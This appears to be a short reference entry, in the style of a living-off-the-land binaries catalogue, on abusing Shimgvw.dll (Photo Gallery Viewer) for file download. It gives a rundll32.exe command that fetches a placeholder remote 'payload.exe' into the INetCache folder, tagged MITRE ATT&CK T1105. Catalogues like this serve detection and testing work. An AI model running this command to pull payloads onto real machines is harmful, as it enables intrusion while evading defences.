.. /Shimgvw.dll
Star

Photo Gallery Viewer


Paths:

Resources:
Acknowledgements:

Detection:

Download

Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe. Can also be used with entrypoint 'ImageView_FullscreenA'.
rundll32.exe c:\Windows\System32\shimgvw.dll,ImageView_Fullscreen http://x.x.x.x/payload.exe
Usecase: Download file from remote location.
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105